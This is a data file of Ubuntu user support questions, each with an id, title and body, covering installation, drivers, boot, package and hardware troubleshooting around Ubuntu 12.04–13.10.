367268	verify if root is encrypted or just home -	can i verify/check if a partition ( root and home ) is encrypted ? if it 's not encrypted , can i encrypt after installing , or do i need to install again ? i want to have root and home partitions encrypted . details : i have a new install of 13.10 , along side windows 8 on a dell xps ( l521x ) because i was installing alongside win 8 , i chose the `` something else '' partitioning option , and ca n't remember the precise encryption settings i chose . i think my home folder is encrypted , based on the fact that there are `` .encryptfs '' files in /home , but i gather this is folder only encryption . i have three partitions dedicated to ubuntu , / , /home and /swap , ideally i 'd like all three encrypted , but need my dual boot to still work with windows . as it 's a fresh install , it would be easier to re-install now than later when i 've installed lots of bits and bobs . near duplicate questions : this question `` how to i verify a partition in encrypted '' references an `` article '' ( actually a question ) which does n't actually show you how to check if a partition is encrypted .
367269	encrypted home directory size	i understand that `` encrypted home directory '' feature should n't eat up space and only mount `` virtual '' drive , but then i do n't understand the output from df : ~ ➤ du -h -- max-depth=0 48g . ~ ➤ df -h filesystem size used avail use % mounted on /dev/sda6 110g 93g 12g 89 % / udev 3.8g 4.0k 3.8g 1 % /dev tmpfs 1.5g 948k 1.5g 1 % /run none 5.0m 8.0k 5.0m 1 % /run/lock none 3.8g 8.0m 3.8g 1 % /run/shm cgroup 3.8g 0 3.8g 0 % /sys/fs/cgroup /home/kb/.private 110g 93g 12g 89 % /home/kb df says i have 93 gigabytes used , while du says it 's only 48 . where is the problem ?
367271	wake on lan on ubuntu ?	there is a computer in lab i need to turn it on wakeonlan , i followed these instructions . i used gwakeonlan tool to wake up the system . the default udp port number is 9 and i checked from the website that port is blocked in my network . so i thought any other will work which are open in my network but nothing worked for me i tried 80 , 443 , 22 , 23,20 , 14000 help !
367273	what 's wrong with mine ubuntu when i install utorrent ?	i just want to intsall utorrent on my ubuntu . i download utorrent on utorrent 's offical site , the file 's name is 'utorrent-server-3.0-ubuntu-10.10-27079.tar.gz ' , and then runned below commend in terminal : sudo tar zxvf utorrent-server-3.0-ubuntu-10.10-27079.tar.gz -c /opt/ sudo ln -s /opt/utorrent-server-v3_0/utserver /usr/bin/utserver utserver -settingspath /opt/utorrent-server-v3_0/ but the terminal said that : bash : /usr/bin/utserver : no such a file or directory what 's wrong ?
367274	i can not install any application anymore	after installing wine and failed to agree on the agreement on the font . this message is shown , and i can not install or remove the ttf-mscorefonts-installer anymore . the package 'ttf-mscorefonts-installer ' is in an inconsistent state and needs to be re-installed , but no archive can be found for it . i use this command first to re install the 'ttf-mscorefonts-instaler ' sudo apt-get -- reinstall install ttf-mscorefonts-installer this error message shows . reading package lists ... done building dependency tree reading state information ... done e : the package ttf-mscorefonts-installer needs to be reinstalled , but i ca n't find an archive for it . and using this command `` sudo apt-cache policy ttf-mscorefonts-installer '' this error message shows . installed : 3.4ubuntu3 candidate : 3.4ubuntu3 version table : *** 3.4ubuntu3 0 100 /var/lib/dpkg/status 3.3ubuntu4 0 500 http : //archive.ubuntu.com/ubuntu/ oneiric/multiverse amd64 packages and with this command `` sudo dpkg-reconfigure ttf-mscorefonts-installer '' this message shows . /usr/sbin/dpkg-reconfigure : ttf-mscorefonts-installer is broken or not fully installed how to solve this problem ? ?
367275	os x mavericks wo n't connect to ubuntu server ( netatalk , avahi )	i 'm really sorry for posting this . i know it may have been asked a thousand times . i have googled like crazy and i 'm on the verge of desperation here . basically , i followed this guide : http : //motionsoundfx.com/2012/05/ubuntu-vnc-afp-macosx/ to create a small personal file server . when i installed it , i was able to connect to it just fine , i connected with my ubuntu username and password and i was able to see the home directory . but later , i had to restart the file server so i could prepare a couple of other hard drives to put in . when the server restarted , i tried to connect to it , but i got an error message on my mac : '' the version of the server you 're trying to connect to is not supported . please contact your system administrator to solve this problem . '' again , i have googled like crazy for this , and everybody says it is a problem with os x lion and up ( assuming it affects mavericks too ) . i have tried all the fixes mentioned for lion and mountain lion and i have n't had any luck . that 's the reason i 'm posting this here : i suspect the problem is with my ubuntu server . this happened after i restarted the server . before restarting the server , i just put in my credentials and saw my home directory . something when i restarted the server must have been messed up . i have found some other solutions , including to use `` shx2 '' in the conf file , but it has n't worked for me . i ask for your help to solve this issue . also please understand i 'm completely illiterate when it comes to linux . this is a nice chance to me to learn the os so please give me detailed steps to do things if you deem it necessary . thank you ! i 'm using ubuntu server 13.10 ( the latest one as of today ) .
367285	what gives , my pictures do n't always appear in my photo folder ? i want to change photo in appearance setting	i would like to change recent photo i took and save it as screen saver . it does not appear in folder when i open it , only photos i took less recently .
367287	problems installing nemesis	i try to install nemesis but the problem is that in the step : make install nemesis-1.4 he does not find libnet but i think i already installed with : sudo apt-get install libdnet-dev after that commands i went to libnet-1.0.2a folder and used the commands ./configure ; make ; sudo make install maybe i installed the dev on the wrong place but i do n't know how to remove them help me pls : (
367288	make ubuntu not mount my win-7 disk as random hash	right now , i use my windows 7 hdd as data-disk for ubuntu , where i store my music and documents . the problem is that the hard drive is mounted with a random hash or something every time i boot , so the path is never the same ( example : /media/petterroea/a26677aa66777e3b ) . how can i make it mount to a permanent path ?
367291	how to enable optical fingerprint sensor on hp probook 4540s ?	i have an hp probook 4540s and want to enable optical fingerprint sensor on it . how does one enable it in ubuntu ?
367294	kubuntu 13.10 boots into grub console	i have made a clean install of kubuntu 13.10 on my thinkpad e530 , and on the first boot grub was in command line mode . i tried reinstalling , it did n't help . this is the first time i 'm using the grub command line , can someone please help ?
367295	how to install amd 's graphics card radeon hd 7470m driver on ubuntu 13.10	my laptop is asus 's x44h , with intel® core™ i3-2350m cpu @ 2.30ghz × 4 , and amd 's graphics card radeon hd 7470m . how i will install my graphics driver .
367296	why did upgrade to saucy replace my host keys on first reboot ?	a upgraded to saucy a while back , but last night was the first time i rebooted since the upgrade . now i noticed my host keys were regenerated and previous host keys were not backed up . -rw -- -- -- - 1 root root 668 oct 28 03:21 ssh_host_dsa_key -rw-r -- r -- 1 root root 601 oct 28 03:21 ssh_host_dsa_key.pub -rw -- -- -- - 1 root root 227 oct 28 03:21 ssh_host_ecdsa_key -rw-r -- r -- 1 root root 173 oct 28 03:21 ssh_host_ecdsa_key.pub -rw -- -- -- - 1 root root 1675 oct 28 03:21 ssh_host_rsa_key -rw-r -- r -- 1 root root 393 oct 28 03:21 ssh_host_rsa_key.pub what caused this ? i checked /etc/init.d/ssh and /etc/init/ssh and see nothing that generates host keys , not even what i expect to find on a first boot of ubuntu .
367300	trouble connecting with remminna	i have a trouble connecting with remmina desktop to a windows 7 machine . i can connect using the ip-address , but not with the computername . if i type in the computername , it gives me a error `` could not connect '' when i connect with the ip address , it works ok .
367301	ubuntu 13.10 software raid	i had already ubuntu os installed on my desktop pc , where the software raid 5 is configured ( 3 partitions / , swap and home ) . this system was upgraded from the 11.04 till 13.04 , it was quite messy , so i decided to install fresh system on existing partitions . 1st of all i found that there is no alternate version of the installer ( which i used to create previous installation ) , so i stared with the regular image . i installed mdadm tools , assemble the partitions - fdisk are showing them properly - so i 'm starting the installation - and everything i going fine until the grub instalation - this part fails - regardless of which partition i use as a target . from the other hand , neither opensuse and ubuntu 12.04 alternate does not have any problems with installing the grub - on this configuration , unfortunatelly ubuntu 12.04 - > 12.10 upgrade is failing bacause of some xorg issues ; ( . maybe someone has an experience with installation of ubuntu 13.10 grub on the raid 5 partitions - and could give me a hint , how to solve my problem . thanks in advance , piotr
367302	cursor ( touchpad ) moves and clicks erratically	sometimes ( usually after two-finger scrolling ) the touchpad on my asus x54c becomes unresponsive and the cursor begins to click and move small distances . clicking seems to happen more often than moving . unlike with other similar problems , i 've never seen the cursor move to ( 0 , 0 ) . suspending ( closing the lid ) and unsuspending does n't help , and neither does moving to a tty and back or rebooting . i 've also tried disabling the touchpad via fn+f9 . that tends to take a long time , but does n't have any effect . i 'm on 13.10 at the moment , but i remember it happening on 13.04 as well . here 's the pointer section of xinput : ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ etps/2 elantech touchpad id=12 [ slave pointer ( 2 ) ]
367308	after upgrade to ubuntu 13.10 keyboard input not working	i just upgraded ubuntu to 13.10 but the keyboard input works fine only until i open whatever program is not part of unity . ( no problems on the unity menu or at login ) everything works fine under the `` flashback '' ( no unity ) session .
367309	how to change grouping of tracks in clementine ?	ca n't get clementine to change grouping of tracks from devices . it groups tracks from my ipod by artist which is not convenient . see screenshot : note that clementine allows to change the grouping of tracks in library , see screenshot : does anybody know how to change grouping for tracks on devices too ?
367310	how to upgrade to latest version of ubuntu ?	i have ubuntu 10.10 installed in my laptop . how can i upgrade it to the latest version without upgrading to 11.04 ? also how much time will this take ? i do not want to lose any data . i also have windows 7 in my machine .
367312	menus ( eg , right-click windows ) are not being drawn on the screen	the `` context menus '' which normally show up on right-click , as well as other pull-downs ( for example evince 's resize screen or any program 's at-the-top menu pulldowns ) are invisible . this is ubuntu 12.04 . i know the computer still thinks it 's drawing them because of the way left-click responds . but i ca n't see its contents . what program draws these ?
367314	ubuntu 12.04 displays a blank screen with no wallpaper and no refresh	my system specs : - intel core 2 duo t7500 @ 2.2ghz - graphic card intel mobile gm965/gl960 operating system - grub tripple boot system : ubuntu 12.04 with cairodock 3.0.0 and compiz cube activated and working ubuntu 11.04 windows 7 i updated my ubuntu 12.04 - after this update i rebooted and was able to log in . there are no wallpapers showing and the main screen is not refreshing ( this is when moving a window around the desktop there are drag-lines showing all over the screen ) . the only way to refresh is to activate the 3d cube . in addition the mouse-over activates inactive windows and when writing a letter moves the cursor wherever the mouse pointer is ) . everything is working as before , except that i can not activate a second monitor to extend the desktop . this produces the following error : error : gdbus.error : org.freedesktop.dbus.error.unknownmethod : no such interface `org.gnome.settingsdaemon.xrandr_2 ' on object at path /org/gnome/settingsdaemon/xrandr before the update no proprietary drivers were activated or necessary and everything was working perfectly ( unity 3d , compiz cube 3d , wobbly windows , cairo dock 3.0.0 , wallpaper changer etc. ) . i was already looking for a way to revert to the last update but there seems to be too many programs that were changed . i looked it up in the update change log in var/log/apt/history.log among the updates were kernel update to 3.2.0-56 xserver-common i386 ( 3.4.2-oubuntu 0.12 , oubunti 0.13 ) xsever-xorg-core i386 ( 1.11.4-oubuntu10.13,1.11.4-oubuntu 10.14 ) this problems are very annoying and i am considering to reinstall ubuntu 12.04 and avoiding the kernel and xserver updates ! but before i do this i thought to raise the question here in order to get an answer how to fix this stupid problem more elegantly ! : - ) oh , in case anybody asks , the other operating systems ( ubuntu 11.04 and windows 7 ) are both still working without any problem because there is any hardware change or problem ! any suggestions are highly welcome ! ! !
367315	install ubuntu using grub2	i have deepin linux installed and now i need to install ubuntu . i do n't have cd rom , so i thought i can use grub2 iso boot option . i have used the link install ubuntu from iso file using grub2 to boot iso using grub2 . i need to install the operating system . when i click install ubuntu icon in desktop , the installer starts . but i ca n't see the option where we can specify the partition . it just directly goes to installing . even if i click install , the installer does nothing and the installation did n't start . what to do ? any ideas ?
367331	how to increase the size of linux-swap partition	i want to increase the size of linux-swap partition after installing ubuntu ( not during the ubuntu installation wizard ) . i want to increase /dev/sda9 partition from 9.31gb to 16 gb.please help me .
367338	my feenix nascita mouse is n't moving my cursor . ubuntu version appears to not matter . how do i debug this , and get the mouse working ?	i had 13.04 , upgraded to 13.10 , and did a fresh install of 13.10 , no luck . any ideas ? just tail -f 'd my syslog and plugged in the mouse . here is what i got : oct 26 16:15:50 orithyia kernel : [ 83369.618365 ] usb 1-1.5.2 : new full-speed usb device number 6 using ehci-pci oct 26 16:15:50 orithyia kernel : [ 83369.718913 ] usb 1-1.5.2 : new usb device found , idvendor=04d9 , idproduct=a081 oct 26 16:15:50 orithyia kernel : [ 83369.718919 ] usb 1-1.5.2 : new usb device strings : mfr=1 , product=2 , serialnumber=0 oct 26 16:15:50 orithyia kernel : [ 83369.718921 ] usb 1-1.5.2 : product : usb gaming mouse oct 26 16:15:50 orithyia kernel : [ 83369.718924 ] usb 1-1.5.2 : manufacturer : holtek oct 26 16:15:50 orithyia kernel : [ 83369.722486 ] input : holtek usb gaming mouse as /devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.5/1-1.5.2/1-1.5.2:1.0/input/input13 oct 26 16:15:50 orithyia kernel : [ 83369.722786 ] hid-generic 0003:04d9 : a081.0004 : input , hidraw3 : usb hid v1.10 keyboard [ holtek usb gaming mouse ] on usb-0000:00:1a.0-1.5.2/input0 oct 26 16:15:50 orithyia kernel : [ 83369.729362 ] hid-generic 0003:04d9 : a081.0005 : usage index exceeded oct 26 16:15:50 orithyia kernel : [ 83369.729366 ] hid-generic 0003:04d9 : a081.0005 : item 0 2 2 2 parsing failed oct 26 16:15:50 orithyia kernel : [ 83369.729379 ] hid-generic : probe of 0003:04d9 : a081.0005 failed with error -22 oct 26 16:15:50 orithyia kernel : [ 83369.731759 ] hid-generic 0003:04d9 : a081.0006 : hiddev0 , hidraw4 : usb hid v1.10 device [ holtek usb gaming mouse ] on usb-0000:00:1a.0-1.5.2/input2 oct 26 16:15:50 orithyia mtp-probe : checking bus 1 , device 6 : `` /sys/devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.5/1-1.5.2 '' oct 26 16:15:50 orithyia mtp-probe : bus : 1 , device : 6 was not an mtp device so , i see it did see it is a mouse ... but the cursor does n't move when i move the mouse . not sure where to debug from here . edit : $ xinput ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ logitech usb laser mouse id=8 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ power button id=7 [ slave keyboard ( 3 ) ] ↳ daskeyboard id=9 [ slave keyboard ( 3 ) ] ↳ daskeyboard id=10 [ slave keyboard ( 3 ) ] ↳ holtek usb gaming mouse id=11 [ slave keyboard ( 3 ) ] kinda funny that a mouse is under the keyboard category . probably related to whatever problem this is .
367339	i need my pendrive to boot into ubuntu , how to correct this and boot from the hdd ?	i installed ubuntu through usb . instillation was successful . but when i restarted my laptop it did n't boot . so planed install it again when started selected install from usb . it booted my previous installed ubuntu . so after went ubuntu boots no need of that pen drive , so in short , every time i want to start my pc i need that pen drive to boot .
367340	` error could not access file 'provider-state'` when bootstrapping	i tried to bootstrap juju but this error shown below keep coming up . error could not access file 'provider-state ' : get http : //x.x.x.138/maas/api/1.0/files/provider-state/ : dial tcp x.x.x.138:80 : no route to host one more thing is my dashboard directory for maas is not 138 , it 's 140 . how to change to 140 ? i 'm stuck .
367341	ubuntu 13.04 recognizes usb mobile broadband modem as ethernet connection	when i plug in my usb mobile broadband modem ( zte mf-667 ) , in the network manager instead of a mobile broadband connection , i get an ethernet connection , called : ethernet network ( zte wcdma technologies msm ) , which of course does n't work . here is my lsusb output and the relevant parts of dmesg output : lsusb : bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 003 : id 0cf3:3005 atheros communications , inc. ar3011 bluetooth bus 001 device 004 : id 04f2 : b1b9 chicony electronics co. , ltd asus integrated webcam bus 001 device 005 : id 058f:6366 alcor micro corp. multi flash reader bus 002 device 004 : id 19d2:1405 zte wcdma technologies msm dmesg : [ 195.328467 ] usb 2-1.1 : new high-speed usb device number 3 using ehci-pci [ 195.423545 ] usb 2-1.1 : new usb device found , idvendor=19d2 , idproduct=1225 [ 195.423555 ] usb 2-1.1 : new usb device strings : mfr=3 , product=2 , serialnumber=4 [ 195.423561 ] usb 2-1.1 : product : zte wcdma technologies msm [ 195.423567 ] usb 2-1.1 : manufacturer : zte , incorporated [ 195.423572 ] usb 2-1.1 : serialnumber : p680a1zted000000 [ 195.426319 ] scsi7 : usb-storage 2-1.1:1.0 [ 196.425354 ] scsi 7:0:0:0 : cd-rom cwid usb scsi cd-rom 2.31 pq : 0 ansi : 2 [ 197.447919 ] usb 2-1.1 : usb disconnect , device number 3 [ 197.457582 ] sr0 : scsi3-mmc drive : 243x/186x xa/form2 cdda pop-up [ 197.457594 ] cdrom : uniform cd-rom driver revision : 3.20 [ 197.459058 ] sr 7:0:0:0 : attached scsi cd-rom sr0 [ 197.459483 ] sr 7:0:0:0 : attached scsi generic sg2 type 5 [ 197.759186 ] usb 2-1.1 : new high-speed usb device number 4 using ehci-pci [ 197.854543 ] usb 2-1.1 : new usb device found , idvendor=19d2 , idproduct=1405 [ 197.854556 ] usb 2-1.1 : new usb device strings : mfr=4 , product=3 , serialnumber=5 [ 197.854564 ] usb 2-1.1 : product : zte wcdma technologies msm [ 197.854572 ] usb 2-1.1 : manufacturer : zte , incorporated [ 197.854579 ] usb 2-1.1 : serialnumber : p680a1zted010000 [ 197.957739 ] scsi8 : usb-storage 2-1.1:1.2 [ 198.076554 ] cdc_ether 2-1.1:1.0 eth1 : register 'cdc_ether ' at usb-0000:00:1d.0-1.1 , cdc ethernet device , 00 : a0 : c6:00:00:00 [ 198.076583 ] usbcore : registered new interface driver cdc_ether [ 198.955985 ] scsi 8:0:0:0 : cd-rom cwid usb scsi cd-rom 2.31 pq : 0 ansi : 2 [ 198.956797 ] scsi 8:0:0:1 : direct-access zte mmc storage 2.31 pq : 0 ansi : 2 i created the appropriate mobile broadband connection manually , but i can not enable it in network manager , since the device is not recognized as mobile broadband . any tips how to make it work ?
367344	usb keyboard hit and miss as to whether it will work on boot-up	i am new to ubuntu . have installed 12.04 on a slave drive while i migrate . usually booting into ubuntu goes without a hitch but recently i often find i am unable to use the keyboard , and log-in using the on-screen kb . sometimes if i remove the usb jack & re-connect it will start working again but not always . i do have an old ps/2 kb which i am using at the moment but ... ... .has anyone any ideas on how to get the usb kb reliably connected ? thanks dave
367347	can not upgrade amd 64 bit ubuntu 13.04 to 13.10 ?	software updater shows that 13.04 is current and an upgrade to 13.10 is available . however , upon hitting the upgrade button , typing in the password and hitting authenticate results in nothing happening . i do not get the 13.10 welcome screen at all . no error messages and the updater just goes away . what is wrong ?
367348	no space in disk ; sudo apt-get clean not working	i have been trying to update my xubuntu version but it keep saying there 's no enough space on disk . the window says me to execute `` sudo apt-get clean '' but i have no answer . it just do n't do anything . how can i free space on disk if `` sudo apt-get clean '' is not working ? ?
367351	ubuntu 12.04.3 - graphics driver : default vs nvidia 319-recommended vs nvidia 319-updated	background : i switched from default driver to nvidia-319-recommended . i am guessing that this update has caused issues with keyboard shortcuts , battery status icon disappearing as well as power management issues as speculated by others . closing laptop lid no longer suspends laptop - it has to be manually done by licking 'suspend ' before closing lid . question : how do you restore the original/default graphics driver ? thanks for your help . regards
367354	how to speed up ubuntu 12.04	i am using ubuntu 12.04 and my system is too much slow , i want to speed it up . i have tried several apps and methods like jupitar , cleaning tmp file , but still my system is too much slow . here is my sys config : 1gb ram 160gb hdd intel duo core
367357	how can i remove c-a as a byobu tmux prefix ?	i figured out how to add set -g prefix ^b to .byobu/profile.tmux i typed the same command at the tmux : line and indeed ^b is now my prefix character , but ^a is also still my prefix character . i 'd like to unbind it . i 've tried unbind ^a at the : prompt . i 've tried unbind-key ^a and unbind c-a and unbind-key c-a and none of them work . how can i unbind ^a without restarting my tmux session ?
367358	eclipse dont show menu 's content	i tried to install eclipse from official site and i 'm getting an issue , eclipse opens with no problem but when i try to access to top menu ( ex : 'file ' ) , it does n't shows anything . it happens on every menu ... but i installed the eclipse from ubuntu software center and it works properly . http : //i.imgur.com/t0yhw48.png ( i was clicking on the refractor button ) thanks ! : )
367366	how to add `` position '' : `` mouse '' in a gtk frameless webapp ?	in node webkit we can add this to package.json . how to do this in gtk webkit ( frameless ) . can i add it somewhere in mainwindow.ui ? i am using quickly to develop .
367367	ubuntu 13.10 install just copies live cd	i 'm installing 13.10 64bit in virtualbox . cd boots fine , i can try live installation , but installation seems to just copy whole cd to disk . after restart it ejects cd and boots to same state as if from cd running installation again just fills up the disk /dev/sda mounted at /media/ { somehexadecimalgibberish }
367370	rebuilding every package from scratch	lets suppose i want to rebuild every package from scratch . is there a simple guide `` from zero to hero '' which could automate this . putting aside details like how much time it would take , or how much hardware would be needed to do this in a reasonable time . lets also start small , and only do the basic command line tools , build tools and enough to make a simple booting system as you 'd get from a clean minimal installation . i.e . no x , no desktop . i want to be able to essentially automate the following pseudo-code for each package in the archive , in sequence get build deps for package ( apt-get build-dep packagename ) get source for package ( apt-get source packagename ) build debian package ( debuild -uc -us ) publish package to a repository what steps are required to do the above in a sane way ( putting aside the insanity of the actual question )
367371	problem using expect variable !	i am trying to automate my vpn using a shell scipt what i want is to get a webpage ( curl ) and parse it for password . if i write a normal script looks something like : var= $ ( curl -i http : //www.vpnbook.com/freevpn | grep `` password : < strong > * '' ) echo $ { var:26:8 } this outputs a password . now , i want to parse this via expect , store it , and then run the openvpn command : spawn sudo openvpn -- config vpnbook-euro2-tcp443.ovpn expect `` enter auth username : '' send `` vpnbook '' expect `` enter password : `` send $ pass i am unable to set this pass variable properly . any ideas ?
367374	display properties\external display wont work	i recently innstalled ubuntu on my laptop ( acer , running on nvidia geforce graphics ) . i plugged in my external display and it worked right away . after i tried to change the resolution , it went black , and now i can only use my laptop display . if i try to change the settings i just get this ; gdbus.error : org.freedesktop.dbus.error.unknownmethod : no such interface `org.gnome.settingsdaemon.xrandr_2 ' on object at path /org/gnome/settingsdaemon/xrandr if i plug in the external at reboot , none of the displays works . tried to reinstall ubuntu without luck .
367375	can not apt-get upgrade ubuntu server	i tried to a upgrade this morning and encountered errors . ran apt-get -f install and got this error below . i do n't recall installing any quantal packages . dpkg : dependency problems prevent configuration of linux-image-generic-lts-quantal : linux-image-generic-lts-quantal depends on linux-image-3.5.0-39-generic ; however : package linux-image-3.5.0-39-generic is not installed . dpkg : error processing linux-image-generic-lts-quantal ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . dpkg : dependency problems prevent configuration of linux-generic-lts-quantal : linux-generic-lts-quantal depends on linux-image-generic-lts-quantal ; however : package linux-image-generic-lts-quantal is not configured yet . dpkg : error processing linux-generic-lts-quantal ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : linux-image-generic-lts-quantal linux-generic-lts-quantal e : sub-process /usr/bin/dpkg returned an error code ( 1 )
367378	i am a member of www-data but still do n't have access to the apache site in /var/www/ although permissions are correct	here are the permissions on my site : drwxrwx -- - 6 www-data root 1024 oct 25 17:12 engn2912b -rw-r -- r -- 1 root root 177 oct 23 20:35 index.html drwxrwx -- - 3 www-data root 1024 oct 16 23:32 php drwxrwx -- - 3 www-data root 1024 oct 27 17:31 uploads and here is my id : uid=1000 ( octi ) gid=1000 ( octi ) groups=1000 ( octi ) ,4 ( adm ) ,24 ( cdrom ) ,27 ( sudo ) ,30 ( dip ) ,33 ( www-data ) ,46 ( plugdev ) ,107 ( lpadmin ) ,124 ( sambashare ) it seems to me that the permissions for the site are correct and i am part of the www-data group . i have set the ownership of the site folders ( engn2912b , uploads and php ) with sudo chown www-data php -r what am i missing ?
367379	problem installing ubuntu 13.10 alongside windows 8	what i have : sony vaio laptop ( sve1512e6ew ) with preinstalled windows 8 . i disabled secure boot some time ago in bios . i already had ubuntu ( previous version ) installed on it , but removed it some time ago . after that , the default windows boot menu is showing up every time i boot up computer , and the only entry is windows 8 . what i did : burned ubuntu 13.10 dvd restarted computer and booted from it chosen install ubuntu ( not try ubuntu ) created new ext4 partition from free space installed ubuntu on it what happened : after the installation i restarted the computer . windows default boot menu showed up ( just as before ) and the only entry was still windows 8 . update : after running boot repair , i saw ubuntu on boot list . i booted into ubuntu and it worked fine , but after restart my computer was stuck at the black screen ( with vaio logo shown ) . so i decided to run boot repair again , but now when i try to boot into ubuntu , i see the following error : windows failed to start . a recent hardware or software change might be the cause . to fix the problem : 1 . insert your windows installation disc and restart your computer . ( windows came preinstalled ) . 2 . choose your language settings , and then click `` next . '' 3 . click `` repair your computer . '' if you do not have this disc , contact your system administrator or computer manufacturer for assistance . file : efi\ubuntu\grubx64.efi status : 0xc000007b info : the application or operation system could n't be loaded because a required file is missing or contains errors . here 's the url that boot repair generated http : //paste.ubuntu.com/6321056/ update 2 : after i changed boot type in bios from uefi to legacy and the back from legacy to uefi grub showed up for the first time . i could but to ubuntu as well as into windows 8 . but after booting into windows 8 and restarting computer , grub did n't show up . i changed boot type to legacy and back to uefi again and grub showed again . so basically , every time i change boot type to legacy and back to uefi it works fine , but when i boot into windows 8 it changes something and prevents grub from showing up ( only windows default boot menu is shown and the only option is windows 8 ) . if you have any additional questions i will try to answer them as quickly as possible .
367381	i could not even open my ubuntu	i did : sudo apt-get remove libsdl-image1.2 libsdl-image1.2-dev guile-1.8 guile-1.8-dev libsdl1.2debian-all libart-2.0-dev libaudiofile-dev libesd0-dev libdirectfb-dev libdirectfb-extra libfreetype6-dev libxext-dev x11proto-xext-dev libfreetype6 libaa1 libaa1-dev libslang2-dev libasound2 libasound2-dev by mistake and everything got deleted one by one and now am not even able to open it.even terminal and ubuntu software center got deleted.please help me retrieve my device files . what do i do now ? ?
367382	i want to uninstall netperf 2.6.0 on ubuntu with linux kernel 3.2.21	i had installed netperf 2.5.0 through apt-get install netperf .but i have netperf 2.6.0 on other pc .so i want to uninstall 2.5.0 and reinstall 2.6.0.kindly help me .i am using ubuntu with kernel 3.2.21
367383	boots into grub menu after install 13.10	i installed a version of ubuntu 13.10 ( latest release ) 32bit and it installs fine . i reboot and it goes directly into the grub command line . if i install ubuntu 13.10 64bit , nothing goes wrong . am i unable to install the 32 bit version ?
367384	how do i enter the euro symbol ?	i have a us english keyboard . how do i enter a euro symbol in ubuntu ? i ca n't find the symbol in character map , and i do n't really want to change keyboard layout just to type one symbol occasionally .
367385	graphical bugs ?	i been using ubuntu for awhile now , its a great operating system , both smooth and responsive , but there are some small things that bug me . rough top window borders . for every windowed application i noticed the rounded corners are not really smooth , is there something i can do to fix this ? like antialias or something to do with compiz manager ? when restoring a window from minimize , theres a white line that flickers for about 1-2 seconds . google chrome has no top menu . for other apps , usually when i move the mouse cursor to the top left corner it shows some menus section but for chrome its just blank . any ideas on how i can fix these minor but annoying issues ?
367391	can not add or update software in software center,	having trouble with software center . it says canceling but does nothing . i get e : could not get lock /var/lib/apt/lists/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock directory /var/lib/apt/lists/ e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? i tried a hard reboot and the problem still exists . thanks for your help
367392	ubuntu software center authentication lxde	installed ubuntu 13.10 for my parents . they are used to windows , so unity was not ideal . i tried installing cinnamon , which worked wonderfully initially , then stopped connecting to the internet and would n't read usb flash drives . removing cinnamon resolved issues . since i still wanted something more windows-esque , i tried lxde . so far it works , but i can not install or remove anything via the ubuntu software center . i get an error message that reads , `` software ca n't be install or removed because the authentication services is not available . '' i can use the temporary workaround sudo software-center for installing/removing most apps , but i can not install chrome ( not chromium ) with this method . any thoughts ?
367396	what represent the startupwmclass field of a .desktop file ?	i am working on this pre-existent .desktop file and i have a doubt : the file content is : [ desktop entry ] # icon=connect-data-space icon=xcloud categories=utility ; type=application # exec=/usr/share/connectdataspace/appl/launcher.sh exec=/usr/share/xcloud/appl/launcher.sh name [ en_us ] =connect data space # name=connect data space name=xcloud comment [ en_us ] = comment= startupnotify=true terminal=false onlyshowin=gnome ; unity ; startupwmclass=connectdataspace actions=checkupgrade [ desktop action checkupgrade ] name=verifica aggiornamenti # exec=java -jar /usr/share/connectdataspace/appl/lib/shellextbridge.jar -checkupgrade exec=java -jar /usr/share/xcloud/appl/lib/shellextbridge.jar -checkupgrade onlyshowin=gnome ; unity ; what exactly represent the startupwmclass field of this file ? tnx andrea
367398	live cd stalls when installing ubuntu 13.10	booting from live cd ubuntu 13.10 64bits , i ca n't get the installation page . just a black page with a system prompt : '' numbers '' bug : soft lockup - cpu # 1 stuck for 22s . this repeats in a very short time . the only thing i can do is force a shut down . i tried usb installation with the same result . this is all what it does : start pc ( laptop ) with live cd or usb , them , after bios screen , a black screen with two options : 0 . no emulation system type 00 1 . no emulation system type 00 . notice both are the same except for the first number . if you select number 1 , the same options appear again but nothing happens . if you select number 0 , the cd starts to move and a new purple screen appears for a few seconds , then gives way to a new black screen with a blinking prompt , the cd stops and after about 20 seconds the following appears : [ 32.080003 ] bug : soft lockup cpu # 0 stuck for 22s [ systemd -udevd:114 ] . every 20 secs , it 's repeat but first number is [ 60.080003 ] , then [ 92.080003 ] .. hardware : intel ( r ) core ( tm ) 2 duo cpu p8600 @ 2.40ghz [ family 6 model 23 stepping 6 ] , nvidia geforce 9300m gs ( 256mb ) driver : 327.02
367399	unable to connect to wireless network thru alternate driver	i just installed ubuntu 13.10 on my windows 7 pc . am a complete newbie to the linux system . i first created a bootable ubuntu usb to try out the os without installing and the wireless worked fine with it after using the additional driver for broadcom 802.11 linux sta wireless driver from bcmwl-kernel-source . however after installing ubuntu from the bootable disk , i am no longer able to use this additional driver . every time i select the additional driver and apply changes , nothing happens , no logs , errors , nothing : ( and it switches back to the previous selection . please help and let me know how can i get the wireless driver to work on the installed ubuntu . edit : please any information how to resolve this issue ?
